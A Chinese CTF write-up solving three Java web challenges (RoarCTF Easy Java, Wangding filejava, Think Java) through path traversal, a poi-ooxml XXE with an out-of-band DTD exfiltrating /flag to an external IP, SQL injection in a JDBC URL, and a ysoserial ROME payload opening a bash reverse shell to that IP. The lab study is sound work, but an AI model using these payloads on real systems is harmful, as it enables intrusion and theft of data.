Javaweb 的一些题目复现
前言
BUUOJ,一些关于java的题目复现(持续更新中)
[RoarCTF 2019]Easy Java
有任意文件读取,读取WEB-INF/web.xml
得到web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
发现有Flag路由,根据这个读一下FlagController.class
读到之后在线反编译一下
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
@WebServlet(
name = "FlagController"
)
public class FlagController extends HttpServlet {
String flag = "ZmxhZ3s4NzBlMDVjMi03NGUwLTQwNjMtOGFkNy0xNmQ1MTUyMWVlNGR9Cg==";
protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
PrintWriter var3 = var2.getWriter();
var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
}
}
发现了flag
[网鼎杯 2020 青龙组]filejava
进去发现下载那里有任意文件读取
/DownloadServlet?filename=../../../../WEB-INF/web.xml
读取web.xml文件
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>
一共有三个Servlet,把他们读出来反编译 JD-GUI
主要看upload.java中
if(filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
try {
Workbook saveFilename = WorkbookFactory.create(in);
Sheet realSavePath = saveFilename.getSheetAt(0);
System.out.println(realSavePath.getFirstRowNum());
} catch (InvalidFormatException var20) {
System.err.println("poi-ooxml-3.10 has something wrong");
var20.printStackTrace();
}
}
这里说了poi-ooxml-3.10
而这个版本刚好有一个XXE漏洞
详细参考https://xz.aliyun.com/t/6996#toc-3
如果上传的是xlsx,且开头为excel-,那么才会触发漏洞。
我们自己新建一个xlsx,用压缩文件打开,修改[Content_Types].xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://47.97.123.81/xml.dtd">
%remote;%int;%send;]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
然后自己vps上写xml.dtd
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://47.97.123.81:11452?p=%file;'>">
然后监听,并上传,flag就弹回来了
[网鼎杯 2020 朱雀组]Think Java
直接给了class文件,拖入JD-GUI审计
扫描得到swagger-ui.html
里面有三个接口
从功能来看,一个是查询数据库功能,一个是登录功能,还有一个current其实是反序列化传入的数据
要登录那肯定要通过SQL注入注处管理员密码
看下源码,这里有明显的SQL注入,且迷人数据库为myapp
可以先查一下发现确实可以
jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#
会被解析成
jdbc:mysql://mysqldbserver:3306/myapp
再带入sql语句
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '#' union select 1#' and table_name='" + TableName + "'
第一个#被单引号包裹。成了普通的#字符。第二个#注释掉了后面的语句。造成sql注入
所以就可以myapp#' union select pwd from user#;
拿到账号密码,拿去登录
{"username":"admin","password":"admin@Rrrr_ctf_asde"}
登陆成功后data是一串java反序列化的东西,Bearer token
把这串数据填入current内时,会显示操作成功,说明这个接口是用来反序列化的。那我们自己构造一个序列化字符串。
这串数据需要先base64,然后转成16进制。
#此处使用python2
import base64
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = base64.b64decode(a).encode('hex')
print(b)
下方的特征可以作为序列化的标志参考:
一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
或者如果以aced开头,那么他就是这一段java序列化的16进制。
可以用yso生成payload
https://github.com/frohoff/ysoserial
java -jar ysoserial-master-d367e379d9-1.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ny4xMjMuODEvMTE0NTEgMD4mMQ==}|{base64,-d}|{bash,-i}" |base64
直接弹shel出来
感觉java弹shell还是这样好用一点,nc,curl都不行。